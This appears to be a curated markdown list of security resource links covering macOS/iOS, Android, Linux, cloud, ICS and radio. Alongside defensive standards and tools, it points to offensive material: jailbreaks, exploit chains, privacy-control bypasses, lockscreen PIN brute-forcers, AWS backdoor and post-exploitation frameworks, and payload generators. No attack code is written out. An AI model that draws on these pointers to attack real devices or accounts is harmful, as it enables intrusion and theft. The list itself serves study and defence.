- [ipwndfu](https://github.com/axi0mX/ipwndfu): open-source jailbreaking tool for older iOS devices.
- [Pair Locking your iPhone with Configurator 2](https://arkadiyt.com/2019/10/07/pair-locking-your-iphone-with-configurator-2/)
- [KTRW](https://googleprojectzero.blogspot.com/2019/10/ktrw-journey-to-build-debuggable-iphone.html): The journey to build a debuggable iPhone.
- [Privilege Escalation | macOS Malware & The Path to Root Part 2](https://www.sentinelone.com/blog/privilege-escalation-macos-malware-the-path-to-root-part-2/). [JSS-Scripts](https://github.com/bp88/JSS-Scripts): Random scripts for use in the Jamf Pro.
- MacOS Red Teaming 211: [Dylib Hijacking](https://lockboxx.blogspot.com/2019/10/macos-red-teaming-211-dylib-hijacking.html)
- [iOS Application Injection](https://arjunbrar.com/post/ios-application-injection): Having been interested jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected.
- [The Mac Malware of 2019 👾](https://objective-see.com/blog/blog_0x53.html): a comprehensive analysis of the year's new malware
- [OSX.EvilQuest Uncovered](https://objective-see.com/blog/blog_0x60.html)
- [Low-Level Process Hunting on macOS](https://objective-see.com/blog/blog_0x4A.html)
- [CVE-2020–9934: Bypassing TCC](https://objective-see.com/blog/blog_0x4C.html) ...for unauthorized access to sensitive user data!
- [Attack Secure Boot of SEP](https://raw.githubusercontent.com/windknown/presentations/master/Attack_Secure_Boot_of_SEP.pdf) windknown@pangu
- [Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities](https://github.com/sslab-gatech/pwn2own2020)
- [Sinter](https://blog.trailofbits.com/2020/08/12/sinter-new-user-mode-security-enforcement-for-macos/): New user-mode security enforcement for macOS. [A user-mode application authorization system for MacOS written in Swift](https://github.com/trailofbits/sinter/)
- [Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection](https://eclecticlight.co/2018/11/12/who-put-that-in-my-full-disk-access-list-ssh-and-mojaves-privacy-protection/)
- [macOS-Fortress](https://github.com/essandess/macOS-Fortress): Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
- [From zero to tfp0 - Part 1: Prologue](http://highaltitudehacks.com/2020/06/01/from-zero-to-tfp0-part-1-prologue/)
- [From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit](http://highaltitudehacks.com/2020/06/01/from-zero-to-tfp0-part-2-a-walkthrough-of-the-voucher-swap-exploit/)
- [We Hacked Apple for 3 Months: Here’s What We Found](https://samcurry.net/hacking-apple/), [some](https://gist.github.com/samwcyo/f8387351ce9acb7cffce3f1dd94ce0d6) [useful](https://gist.github.com/ziot/ef5297cc1324b13a8fae706eeecc68a5) [scripts](https://gist.github.com/ziot/ef5297cc1324b13a8fae706eeecc68a5) [available](https://gist.github.com/ziot/3c079fb253f4e467212f2ee4ce6c33cb)
- [MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/)
- [NetworkSniffer](https://github.com/evilpenguin/NetworkSniffer): Log iOS network traffic without a proxy
- [IPv6 security](https://support.apple.com/guide/security/ipv6-security-seccb625dcd9/1/web/1)
- [OpenHaystack](https://github.com/seemoo-lab/openhaystack): Build your own 'AirTags' label today! Framework for tracking personal Bluetooth devices via Apple's massive Find My network.
- [All Your Macs Are Belong To Us](https://objective-see.com/blog/blog_0x64.html): bypassing macOS's file quarantine, gatekeeper, and notarization requirements
- [macOS Security Compliance Project](https://support.apple.com/guide/sccc/macos-security-compliance-project-sccc22685bb2/web), [nist](https://github.com/usnistgov/macos_security)
- [Introducing](https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520) [Mystikal](https://github.com/D00MFist/Mystikal): macOS Initial Access Payload Generator.
- [Mythic-Macro-Generator](https://github.com/cedowens/Mythic-Macro-Generator)
- [macOSTools](https://github.com/xorrior/macOSTools): macOS Offensive Tools
- [TrueTree](https://github.com/themittenmac/TrueTree): A command line tool for pstree-like output on macOS with additional pid capturing capabilities.
- [Zero-Day TCC bypass discovered in XCSSET malware](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
- [Dissecting the Apple M1 GPU, part I](https://rosenzweig.io/blog/asahi-gpu-part-1.html) and [issecting the Apple M1 GPU, part IV](https://rosenzweig.io/blog/asahi-gpu-part-4.html)
- [macos_shell_memory](https://github.com/djhohnstein/macos_shell_memory): Execute MachO binaries in memory using CGo.
- [pwn-my](https://github.com/RPwnage/pwn-my): iOS 14.5 WebKit/Safari based Jailbreak
- [M1RACLES](https://m1racles.com/): M1ssing Register Access Controls Leak EL0 State. CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip.
- [Vulnerability Spotlight: A deep dive into macOS SMB server](https://blog.talosintelligence.com/2021/06/vuln-spotlight-smb-mac-deep-dive.html)
- [How to Use Kerberos on macOS](https://uit.stanford.edu/service/ess/mac/docs/kerberos_macOS)
- [Bypassing macOS TCC User Privacy Protections By Accident and Design](https://labs.sentinelone.com/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)
- [Anecdotes About the macOS Sandbox File Limit](https://buckleyisms.com/blog/anecdotes-about-the-macos-sandbox-file-limit/)
- [SSD Advisory – macOS Finder RCE](https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/): Find out how a vulnerability in macOS Finder system allows remote attackers to trick users into running arbitrary commands.
- [How malware gets into the App Store and why Apple can't stop that](https://habr.com/en/post/580272/)
- [Quick Analysis for the SSID Format String Bug](https://blog.chichou.me/2021/06/20/quick-analysis-wifid/)
- [De Rebus Antiquis](https://xerub.github.io/ios/iboot/2018/05/10/de-rebus-antiquis.html): This article aims to explain how to exploit the recursive stack overflow bug in the iOS 7 bootchain. [page source](https://github.com/xerub/xerub.github.io), [ios-kexec-utils](https://github.com/xerub/ios-kexec-utils), [iRecovery](https://github.com/xerub/irecovery) -> [new repo](https://github.com/Chronic-Dev/libirecovery), iOS [GID Key](https://www.theiphonewiki.com/wiki/GID_Key)
- [AirTag Scripts & Resources](https://github.com/seemoo-lab/airtag): AirTag instrumentation including AirTechno and firmware downgrades.
- [Pegasus ID](https://github.com/jonathandata1/pegasus_spyware_detection_utils_ios_aos): After extensive research and understanding of how Pegasus Spyware is operating inside of iOS and AndroidOS systems I have created tools that will be able to identify & validate the presence of the spyware on your mobile devices, and tablets. Initial detection points were derived from the mvt-project.
- [UTM](https://mac.getutm.app/): Securely run operating systems on your Mac. [repo](https://github.com/utmapp/UTM)
- [qemu-t8030](https://github.com/TrungNguyen1909/qemu-t8030): iPhone 11 emulated on QEMU.
- [Dissecting TriangleDB, a Triangulation spyware implant](https://securelist.com/triangledb-triangulation-implant/110050/)

## Mobile

- [Today I make public ALL *recordings* and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020!](https://twitter.com/reyammer/status/1392910107533619210) [Slides & Recordings](https://mobisec.reyammer.io/slides)

### Android

- [android-security-awesome](https://github.com/ashishb/android-security-awesome): A collection of android security related resources.
- [tip toeing past android 7’s network security configuration](https://sensepost.com/blog/2018/tip-toeing-past-android-7s-network-security-configuration/)
- [A Story About Three Bluetooth Vulnerabilities in Android](https://blog.quarkslab.com/a-story-about-three-bluetooth-vulnerabilities-in-android.html)
- [Creating an Android Open Source Research Device on Your PC](https://www.bellingcat.com/resources/how-tos/2018/08/23/creating-android-open-source-research-device-pc/)
- [Droidefense](https://github.com/droidefense/engine): Advance Android Malware Analysis Framework
- [android-device-check](https://github.com/nelenkov/android-device-check): Check Android device security settings
- [Project Zero](https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html): OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
- [I'm looking at a Huawei P20 from China, let see what can I found](https://threader.app/thread/1051204370543648770)
- [Tracking down the developer of Android adware affecting millions of users](https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/)
- [CLI tool to analyze APKs](https://github.com/te-k/apkcli)
- [Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot](https://raw.githubusercontent.com/TrapaSecurity/presentations/master/us-20-Chao-Breaking-Samsung's-Root-of-Trust-Exploiting-Samsung-Secure-Boot.pdf)
- [TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices](https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices)
- [Exploiting Android Messengers with WebRTC: Part 3](https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html)
- [setools-android](https://github.com/xmikos/setools-android): Unofficial port of setools to Android with additional sepolicy-inject utility included.
- [Security Guidelines](https://openharmony.gitee.com/openharmony/docs/blob/master/docs-en/security/security-guidelines.md): OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data.
- [Proxying Android app traffic – Common issues / checklist](https://blog.nviso.eu/2020/11/19/proxying-android-app-traffic-common-issues-checklist/)
- [Magisk](https://github.com/topjohnwu/Magisk): is a suite of open source software for customizing Android, supporting devices higher than Android 5.0.
- [Magisk Trust User Certs](https://github.com/NVISOsecurity/MagiskTrustUserCerts): A Magisk module that automatically adds user certificates to the system root CA store.
- [MagiskFrida](https://github.com/ViRb3/magisk-frida): Run frida-server on boot with Magisk, always up-to-date.
- [Android-PIN-Bruteforce](https://github.com/urbanadventurer/Android-PIN-Bruteforce): Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb).
- [Mobile Threat Catalogue](https://github.com/usnistgov/mobile-threat-catalogue): NIST/NCCoE Mobile Threat Catalogue.
- [CiLocks](https://github.com/tegal1337/CiLocks): Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.
- [mvt](https://github.com/mvt-project/mvt): MVT is a forensic tool to look for signs of infection in smartphone devices.
- [Oscorp evolves into UBEL: an advanced Android malware spreading across the globe](https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution)
- [Android Application Penetration Testing Checklist](https://www.xmind.net/m/GkgaYH/)
- [50 secrets codes on Android](https://canaltech.com.br/android/codigos-secretos-celular-android/)
- [MobSecco](https://github.com/Anof-cyber/MobSecco): Cloning apk for bypassing code tampering detection, Google Safety Net and scanning vulnerable plugins.

### Linux/ *Nix

- [BCC](https://github.com/iovisor/bcc): Tools for BPF-based Linux IO analysis, networking, monitoring, and more
- [OpenSnitch is a GNU/Linux port of the Little Snitch application firewall](https://github.com/evilsocket/opensnitch)
- [Security Onion](https://github.com/Security-Onion-Solutions/security-onion):Linux distro for IDS, NSM, and Log Management
- [Linux Kernel Defence Map](https://github.com/a13xp0p0v/linux-kernel-defence-map)
- [wcc](https://github.com/endrazine/wcc): The Witchcraft Compiler Collection
- [Ground Zero: Reverse Engineering](https://scriptdotsh.com):
- Part 1-2: [Password Protected Reverse Shells – Linux x64](https://scriptdotsh.com/index.php/2018/07/26/ground-zero-part-1-2-reverse-engineering-password-protected-reverse-shells-linux-x64/)
- Active Directory Dojo:
- [Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh](https://scriptdotsh.com/index.php/2018/06/09/active-directory-penetration-dojo-setup-of-ad-penetration-lab-part-1/)
- [Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh](https://scriptdotsh.com/index.php/2018/08/26/active-directory-penetration-dojo-setup-of-ad-penetration-lab-part-2/)
- [Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh](https://scriptdotsh.com/index.php/2018/10/29/active-directory-penetration-dojo-creation-of-forest-trust/)
- [Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh](https://scriptdotsh.com/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/)
- [Dmesg under the hood](https://ops.tips/blog/dmesg-under-the-hood/): Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user.
- [Randomize your MAC address using NetworkManager](https://fedoramagazine.org/randomize-mac-address-nm/)
- [Shadow-Box](https://github.com/kkamagui/shadow-box-for-x86/tree/gatekeeper): Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - [presentation](https://github.com/kkamagui/papers/blob/master/bevx-2018/presentation.pdf) and [other papers](https://github.com/kkamagui/papers)
- [Privilege Escalation](https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html): pentestbook
- Project Zero: [A cache invalidation bug in Linux memory management](https://googleprojectzero.blogspot.com/2018/09/a-cache-invalidation-bug-in-linux.html)
- [Announcing flickerfree boot for Fedora 29](https://hansdegoede.livejournal.com/19224.html)
- [The Linux Backdoor Attempt of 2003](https://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-attempt-of-2003/)
- (PT-BR) [Análise de binários em Linux](https://wiki.hackstore.com.br/An%C3%A1lise_de_bin%C3%A1rios_em_Linux)
- [GMER](http://www.gmer.net/): Rootkit Detector and Remover
- [suprotect](https://github.com/perceptionpoint/suprotect): Changing memory protection in an arbitrary process
- [A look at home routers, and a surprising bug in Linux/MIPS](https://cyber-itl.org/2018/12/07/a-look-at-home-routers-and-linux-mips.html)
- (pt-br) [Hacking Tricks](http://maycon.hacknroll.io/hacking-tricks/2019/01/08/linux-privesc-with-capability.html): Escalação de Privilégio em Linux com Capability
- [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/): It's just a basic & rough guide.
- [Linux process infection (part I)](https://www.tarlogic.com/en/blog/linux-process-infection-part-i/):Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence.
- [tpotce](https://github.com/dtag-dev-sec/tpotce): T-Pot Universal Installer and ISO Creator.
- [Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials](https://shenaniganslabs.io/2019/05/21/LXD-LPE.html): LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
- [Linuxprivchecker.py](https://github.com/sleventyeleven/linuxprivchecker): A Linux Privilege Escalation Check Script.
- [Linux Kernel exploitation Tutorial.](https://github.com/Lazenca/Kernel-exploit-tech)
- [ebpf_exporter](https://github.com/cloudflare/ebpf_exporter): Prometheus exporter for custom eBPF metrics
- [Zydra](https://github.com/hamedA2/Zydra): is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords.
- [A gentle introduction to Linux Kernel fuzzing](https://blog.cloudflare.com/a-gentle-introduction-to-linux-kernel-fuzzing/) - [code](https://github.com/cloudflare/cloudflare-blog/tree/master/2019-07-kernel-fuzzing)
- [Teardown of a Failed Linux LTS Spectre Fix](https://grsecurity.net/teardown_of_a_failed_linux_lts_spectre_fix.php): Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
- [Ropstar](https://github.com/xct/ropstar): Automatic exploit generation for simple linux pwn challenges.
- [Ken Thompson's Unix password](https://leahneukirchen.org/blog/archive/2019/10/ken-thompson-s-unix-password.html)
- [Exploiting Wi-Fi Stack on Tesla Model S](https://keenlab.tencent.com/en/2020/01/02/exploiting-wifi-stack-on-tesla-model-s/)
- [dlinject.py](https://github.com/DavidBuchanan314/dlinject): Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
- [(Ab)using Kerberos from Linux](https://www.onsecurity.co.uk/blog/abusing-kerberos-from-linux)
- [LKRG](https://github.com/openwall/lkrg): Linux Kernel Runtime Guard
- [Privilege Escalation via Python Library Hijacking](https://rastating.github.io/privilege-escalation-via-python-library-hijacking/)
- [Logging Passwords on Linux](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/)
- [Kicksecure ™](https://www.whonix.org/wiki/Kicksecure): A Security-hardened, Non-anonymous Linux Distribution
- [Setuid Demystified](https://people.eecs.berkeley.edu/~daw/papers/setuid-usenix02.pdf)
- [ProcDump-for-Linux](https://github.com/microsoft/ProcDump-for-Linux): A Linux version of the ProcDump Sysinternals tool
- [OPNsense GUI, API and systems backend](https://github.com/opnsense/core)
- [static-binaries](https://github.com/andrew-d/static-binaries): Various *nix tools built as statically-linked binaries.
- [Traitor](https://github.com/liamg/traitor): Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins ⬆️ ☠️
- [traitor](https://github.com/liamg/traitor)
- [ProcMon-for-Linux](https://github.com/Sysinternals/ProcMon-for-Linux/): is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system.
- [OSWatcher](https://github.com/Wenzel/oswatcher): A framework to track the evolution of Operating Systems over time.
- [Producing a trustworthy x86-based Linux appliance](https://mjg59.dreamwidth.org/57199.html)
- [Running a quick NMAP scan to inventory my network](https://www.redhat.com/sysadmin/quick-nmap-inventory)
- [Packet Strider](https://github.com/benjeems/packetStrider): A network packet forensics tool for SSH.
- [telfhash](https://github.com/trendmicro/telfhash) (Trend Micro ELF Hash): Symbol hash for ELF files.
- [64-bit Linux stack smashing tutorial: Part 1](https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/)
- [Hardening ELF binaries using Relocation Read-Only (RELRO)](https://www.redhat.com/en/blog/hardening-elf-binaries-using-relocation-read-only-relro)
- [Linux Threat Report 2021 1H](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations)
- [Learning Linux Kernel Exploitation - Part 1](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/) [Part 2](https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/)
- [Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/)
- [So You Wanna Pwn The Kernel?](https://sam4k.com/so-you-wanna-pwn-the-kernel/)
- [SMB “Access is denied” caused by anti-NTLM relay protection](https://medium.com/tenable-techblog/smb-access-is-denied-caused-by-anti-ntlm-relay-protection-659c60089895)

### Cloud

- [Scout Suite](https://github.com/nccgroup/ScoutSuite): Multi-Cloud Security Auditing Tool
- [Cloud Security Research](https://github.com/RhinoSecurityLabs/Cloud-Security-Research): Cloud-related research releases from the Rhino Security Labs team.
- [gVisor](https://github.com/google/gvisor): is an application kernel, written in Go, that implements a substantial portion of the Linux system surface.
- [PARSEC](https://github.com/parallaxsecond/parsec): Platform AbstRaction for SECurity service
- [Cloud Security Alliance](https://cloudsecurityalliance.org/): The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment.
- [CIS Controls Cloud Companion Guide](https://www.cisecurity.org/white-papers/cis-controls-cloud-companion-guide/)
- [CloudFail](https://github.com/m0rtem/CloudFail): Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
- (discontinued) [HatCloud](https://github.com/HatBashBR/HatCloud)
- [Uncovering bad guys hiding behind CloudFlare](http://www.crimeflare.org:82/cfs.html)
- [CloudFlair](https://github.com/christophetd/CloudFlair): Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
- [thsosrtl](https://github.com/Top-Hat-Sec/thsosrtl): Repo for tools - cloud and vpn. [cloudIP](https://github.com/Top-Hat-Sec/thsosrtl/blob/master/CloudIP/cloudip.sh): was originally thought of for attempting to resolve the true IP address of targets running through cloudflare.
- [Malicious Shell Script Steals Cloud Credentials](https://www.trendmicro.com/en_us/research/21/a/malicious-shell-script-steals-cloud-credentials.html)
- [badPods](https://github.com/BishopFox/badPods): A collection of manifests that will create pods with elevated privileges.
- [carbon-black-cloud-sdk-python](https://github.com/carbonblack/carbon-black-cloud-sdk-python) VMware Carbon Black Cloud Python SDK.
- [Baserunner](https://github.com/iosiro/baserunner): A tool for exploring Firebase datastores.
- [A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next](https://medium.com/anton-on-security/a-soc-tried-to-detect-threats-in-the-cloud-your-wont-believe-what-happened-next-4a2ba0ab5d81)
- The [Cloud Native Computing Foundation](https://www.cncf.io/) (CNCF) hosts critical components of the global technology infrastructure.
- [Checkov](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code.
- [KICS](https://github.com/Checkmarx/kics) stands for Keeping Infrastructure as Code Secure, it is open source and is a must-have for any cloud native project. [KICS](https://kics.checkmarx.net/) finds security vulnerabilities, compliance issues, and infrastructure misconfigurations in following Infrastructure as Code solutions: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible. 1900+ queries are available.
- [10 real-world stories of how we’ve compromised CI/CD pipelines](https://research.nccgroup.com/2022/01/13/10-real-world-stories-of-how-weve-compromised-ci-cd-pipelines/)
- [GitHub Action Runners](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/github-action-runners-analyzing-the-environment-and-security-in-action), Analyzing the Environment and Security in Action.

### GCP/Google

- [gcp dhcp takeover code exec](https://github.com/irsl/gcp-dhcp-takeover-code-exec): Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent
- [New research: How effective is basic account hygiene at preventing hijacking](https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html) [Five things you can do right now to stay safer online](https://www.blog.google/technology/safety-security/five-things-you-can-do-right-now-to-stay-safer-online/)

### Azure

- [SimuLand](https://github.com/Azure/SimuLand): Understand adversary tradecraft and improve detection strategies.
- [Azure-Readiness-Checklist](https://github.com/ghostinthewires/Azure-Readiness-Checklist): This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important!
- [Preventing Exposed Azure Blob Storage](https://isc.sans.edu/forums/diary/Preventing+Exposed+Azure+Blob+Storage/26786/)
- [Open Azure blobs search on grayhatwarfare.com and other updates](https://grayhatwarfare.medium.com/open-azure-blobs-search-on-grayhatwarfare-com-and-other-updates-89f709b10412)
- [ChaosDB](https://chaosdb.wiz.io/): is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database - Cosmos DB.
- [Introducing Project Freta](https://www.microsoft.com/en-us/research/blog/toward-trusted-sensing-for-the-cloud-introducing-project-freta/): Toward trusted sensing for the cloud. [docs](https://docs.microsoft.com/en-us/security/research/project-freta/)
- [Finding Azurescape](https://unit42.paloaltonetworks.com/azure-container-instances/): Cross-Account Container Takeover in Azure Container Instances
- Azure Monitor: [Malicious KQL Query](https://securecloud.blog/2022/04/27/azure-monitor-malicious-kql-query/)

### AWS

- [git-secrets](https://github.com/awslabs/git-secrets): Prevents you from committing secrets and credentials into git repositories.
- [CloudMapper](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
- [Security Monkey](https://github.com/Netflix/security_monkey): Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
- [my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools): List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
- [RKMS](https://github.com/armanshan12/rkms): RKMS is a highly available key management service, built on top of AWS's KMS.
- [FireProx](https://github.com/ustayready/fireprox): AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
- [AWS IAM privileges as found using the AWS Policy Generator described at](https://gist.github.com/0xdabbad00/fa918ad85c0c3f0e0fa9a3f6b53696de)
- [Sadcloud](https://github.com/nccgroup/sadcloud): A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
- [Endgame](https://endgame.readthedocs.io/en/latest/): Creating [Backdoors in AWS](https://github.com/agnivesh/endgame/).
- [Bucky](https://github.com/smaranchand/bucky): An automatic S3 bucket discovery tool.
- [Prowler](https://github.com/toniblyx/prowler#features): Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
- [barq](https://github.com/Voulnet/barq): The AWS Cloud Post Exploitation framework!
- [Text → AWS IAM Policy](https://text2iam.com/): Describe your ideal AWS IAM Policy in plain text and will use GPT-3 from Open AI to generate an AWS IAM policy.

## Risk Assessment and Vulnerability Management

- (PT-BR) [Gerenciamento de Risco Cibernético](http://minutodaseguranca.blog.br/gerenciamento-de-risco-de-seguranca-cibernetica/)
- [RITA (Real Intelligence Threat Analytics)](https://github.com/ocmdev/rita)
- [Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash](https://twitter.com/thegrugq/status/1192270879687753728) by grugq.
- [ISO27001 audit in real-time....](https://twitter.com/tjcmorgan/status/1305425180903313409)
- [Gearing Towards Your Next Audit](https://www.tripwire.com/state-of-security/security-data-protection/security-configuration-management/compliance-efforts-audit-scm/): Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards.
- [Nuclei](https://github.com/projectdiscovery/nuclei) is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates): Community curated list of templates for the nuclei engine to find a security vulnerability in application.
- [Nuclei unleashed - writing first exploit](https://medium.com/@gpiechnik/nuclei-unleashed-writing-first-exploit-6a8dbd6b80b0)
- [Secure design principles](https://www.ncsc.gov.uk/collection/cyber-security-design-principles)
- [Risk Assessment of GitHub Copilot](https://gist.github.com/0xabad1dea/be18e11beb2e12433d93475d72016902)
- [ISA/IEC 62443](https://www.isa.org/certification/certificate-programs/cybersecurity)
- [Understanding IEC 62443](https://www.iec.ch/blog/understanding-iec-62443)
- [NERC CIP](https://www.nerc.com/pa/Stand/Pages/CIPStandards.aspx)
- [Threat Modeling Manifesto](https://www.threatmodelingmanifesto.org/)
- [hcltm](https://github.com/xntrik/hcltm): Documenting your Threat Models with HCL.
- [Risk Management Framework for Systems and Organizations Introductory Course](https://csrc.nist.gov/CSRC/media/Projects/risk-management/images-media/rmf-training/intro-course-v2_0/index.html)

### Guidelines

- [NIST Special Publication 800-63B: Digital Identity Guidelines](https://pages.nist.gov/800-63-3/sp800-63b.html)
- [Easy Ways to Build a Better P@$5w0rd](https://www.nist.gov/blogs/taking-measure/easy-ways-build-better-p5w0rd)
- [Time for Password Expiration to Die](https://www.sans.org/security-awareness-training/blog/time-password-expiration-die)
- [Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events](https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/identify-protect)

## ICS (SCADA)

- [GRASSMARLIN](https://github.com/nsacyber/GRASSMARLIN): Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments.
- [ATT&CK® for Industrial Control Systems](https://collaborate.mitre.org/attackics/index.php/Main_Page)
- [THE RACE TO NATIVE CODE EXECUTION IN PLCS](https://claroty.com/2021/05/28/blog-research-race-to-native-code-execution-in-plcs/)
- [The Top 20 Secure PLC Coding Practices Project](https://gca.isa.org/blog/the-top-20-secure-plc-coding-practices-project)
- Synchrophasor
- [IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems](https://standards.ieee.org/standard/C37_118_1-2011.html)
- [Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements](https://webstore.iec.ch/publication/28722#:~:text=IEC%2FIEEE%2060255%2D118%2D1%3A2018%20is%20used,all%20three%20of%20these%20quantities.)
- [IEEE C37.118 protocol](https://www.typhoon-hil.com/documentation/typhoon-hil-software-manual/References/c37_118_protocol.html)
- [IEEE C37.118 Synchrophasor Protocol](https://wiki.wireshark.org/IEEE%20C37.118) - wireshark wiki
- [INFRA:HALT](https://www.forescout.com/research-labs/infra-halt/): Forescout Research Labs and JFrog Security Research discover 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack, allowing for Denial of Service or Remote Code Execution primarily affecting operational technology (OT) and industrial control system (ICS) devices.
- [Findings From Examining More Than a Decade of Public ICS/OT Exploits](https://www.dragos.com/resource/findings-from-examining-public-ics-ot-exploits/)
- [The Top 20 Secure PLC Coding Practices Project](https://gca.isa.org/blog/the-top-20-secure-plc-coding-practices-project)
- [Conpot](https://github.com/mushorg/conpot): ICS/SCADA honeypot.
- [Hello_Proto](https://github.com/industrialarmy/hello_proto): "Banner Grabbing" en entornos industriales.

## Radio

- [Qualcomm chain-of-trust](https://lineageos.org/engineering/Qualcomm-Firmware/)
- [Presenting QCSuper](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/): a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones. [github](https://github.com/P1sec/QCSuper)
- [Logitech keyboards and mice vulnerable to extensive cyber attacks](https://www.heise.de/ct/artikel/Logitech-keyboards-and-mice-vulnerable-to-extensive-cyber-attacks-4464533.html)
- [A look at GSM](https://harrisonsand.com/posts/gsm-security/)
- [The gr-gsm project](https://github.com/ptrkrysik/gr-gsm): Gnuradio blocks and tools for receiving GSM transmissions.
- [srsLTE](https://github.com/srsLTE/srsLTE): Open source SDR LTE software suite from Software Radio Systems (SRS)
- [List of software-defined radios](https://en.wikipedia.org/wiki/List_of_software-defined_radios)
- [Spectrum Analyzers, Linux](https://www.hitsquad.com/smm/linux/SPECTRUM_ANALYZERS/)
- [Sonic Visualiser](https://www.sonicvisualiser.org/download.html):
- [spek](http://spek.cc/). [repo](https://github.com/alexkay/spek)
